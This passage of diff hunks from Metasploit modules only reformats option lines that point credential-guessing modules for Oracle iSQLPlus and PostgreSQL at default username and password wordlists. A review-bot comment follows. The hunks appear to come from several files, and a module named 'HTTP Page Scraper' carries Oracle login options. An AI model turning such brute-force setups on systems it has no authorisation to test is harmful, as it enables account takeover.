+ '<getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/>' +
+ '<checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>'
begin
res = send_request_cgi({
@@ -1,5 +1,5 @@
##
-# $Id: $
+# $Id$
##
##
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'HTTP Page Scraper',
- 'Version' => '$Revision: 13183 $',
+ 'Version' => '$Revision$',
'Description' => 'Scrap defined data from a specific web page based on a regular expresion',
'Author' => ['et'],
'License' => MSF_LICENSE
@@ -46,7 +46,8 @@ def initialize
OptString.new('URI', [ true, 'Oracle iSQLPlus path.', '/isqlplus/']),
OptString.new('SID', [ false, 'Oracle SID' ]),
OptInt.new('TIMEOUT', [false, 'Time to wait for HTTP responses', 60]),
- OptPath.new('USERPASS_FILE', [ false, "File containing users and passwords separated by space, one pair per line", File.join(Msf::Config.install_root, "data", "wordlists", "oracle_default_userpass.txt") ]),
+ OptPath.new('USERPASS_FILE', [ false, "File containing users and passwords separated by space, one pair per line",
+ File.join(Msf::Config.install_root, "data", "wordlists", "oracle_default_userpass.txt") ]),
OptBool.new('USER_AS_PASS', [ false, "Try the username as the password for all users", false]),
], self.class)
@@ -40,9 +40,12 @@ def initialize(info = {})
register_options(
[
- OptPath.new('USERPASS_FILE', [ false, "File containing (space-seperated) users and passwords, one pair per line", File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_userpass.txt") ]),
- OptPath.new('USER_FILE', [ false, "File containing users, one per line", File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_user.txt") ]),
- OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line", File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_pass.txt") ]),
+ OptPath.new('USERPASS_FILE', [ false, "File containing (space-seperated) users and passwords, one pair per line",
+ File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_userpass.txt") ]),
+ OptPath.new('USER_FILE', [ false, "File containing users, one per line",
+ File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_user.txt") ]),
+ OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line",
+ File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_pass.txt") ]),
], self.class)
deregister_options('SQL')
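Review bot: The re-wrapped USERPASS_FILE description on the first added line keeps the misspelling "space-seperated"; this string is the option's user-facing help text, so fix it while the line is being touched: `OptPath.new('USERPASS_FILE', [ false, "File containing (space-separated) users and passwords, one pair per line",`. The remainder of initialize is outside the hunk.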